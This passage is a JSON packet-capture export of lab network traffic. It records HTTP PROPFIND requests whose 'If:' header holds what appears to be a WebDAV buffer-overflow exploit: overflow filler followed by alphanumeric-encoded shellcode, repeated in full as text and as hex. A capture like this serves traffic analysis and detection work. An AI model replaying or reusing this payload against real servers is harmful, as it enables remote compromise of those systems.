5:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/mmIiqLNRggCmWuixLmJnYLFVsiDKswcWbyKzPNRWDthOzJifIHtJoGadcBmBblnvoZGBkscGfBUnjMAfBoodygMWbGeizO<7A><4F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ACfvXbGJCnugJYsYHsiliybGGvvmQpnvDiabejmSQhJRZWVbsmpbZsATWuuAwbRWFSyegEIneRdohyhbAyqYaGdtzcQOdm<64><6D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "309"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.784106000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.784106000",
|
||
"frame.time_delta": "0.000046000",
|
||
"frame.time_delta_displayed": "0.088199000",
|
||
"frame.time_relative": "17.035046000",
|
||
"frame.number": "316",
|
||
"frame.len": "315",
|
||
"frame.cap_len": "315",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "301",
|
||
"ip.id": "0x00003ecf",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000f194",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "43975",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "43975",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "53",
|
||
"tcp.len": "249",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3317360552",
|
||
"tcp.nxtseq": "1698",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2868524506",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000d8bb",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:2f:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:2f:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868591",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000362000",
|
||
"tcp.analysis.bytes_in_flight": "1697",
|
||
"tcp.analysis.push_bytes_sent": "1697"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000628000",
|
||
"tcp.time_delta": "0.000046000"
|
||
},
|
||
"tcp.payload": "4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "315",
|
||
"tcp.segment": "316",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1697",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:61:4c:70:6a:58:73:58:75:4f:46:78:73:54:6c:6e:59:73:7a:61:4d:42:6e:67:44:51:45:41:46:58:72:55:67:78:45:61:4e:67:53:6c:6e:53:4c:48:75:53:68:6e:56:65:4f:46:52:4b:78:43:49:6f:70:66:57:50:49:56:6f:43:56:59:68:6d:4c:72:62:79:55:55:6a:78:62:46:65:54:6e:57:59:6d:6a:6e:78:47:66:43:5a:50:e6:85:8c:e6:ad:88:e6:85:ba:e7:8d:a3:e6:ad:a1:e4:89:86:e7:85:92:e5:a1:b5:e6:a5:87:e6:91:99:e6:91:8e:e5:a1:ab:e6:b9:82:e5:91:95:e5:9d:91:e4:91:ad:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:ad:99:e6:b5:aa:e4:89:83:e6:b1:b8:e4:89:a6:e6:95:a3:e7:8d:86:e6:bd:87:e4:95:85:e6:9d:94:e6:91:87:e7:a5:97:e5:a1:8a:e6:b1:89:e7:a5:91:e6:91:b7:e5:9d:b7:e5:a5:8d:e7:a9:a7:e4:a5:ab:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:7a:41:50:75:53:71:74:4a:4b:65:66:6e:6b:67:66:71:6a:69:4d:58:61:4e:44:45:44:6d:66:55:6b:70:48:71:4f:6c:52:67:4e:52:79:45:50:41:43:4c:68:55:4b:6a:5a:4a:66:53:6d:47:71:74:53:46:63:7a:5a:4c:75:4e:4d:78:4c:75:63:41:56:59:58:71:61:6f:55:55:75:69:72:47:78:71:54:6e:42:56:62:4c:46:4b:4a:e6:ad:86:e6:95:b4:e4:9d:ae:e6:bd:b5:e6:b1:b8:e6:85:a5:e4:bd:86:e4:9d:8e:e5:a1:a1:e4:a1:aa:e5:91:a4:e7:9d:b4:e5:85:ac:e4:a1:8e:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:9d:93:e7:89:8c:e6:91:a3:e5:95:9a:e1:8f:80:e6:a0:83:e4:bd:b5:e4:ad:ba:e6:95:b8:e4:b1:a6:e5:81:a4:e4:8d:b8:e6:99:a7:e7:89:a3:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
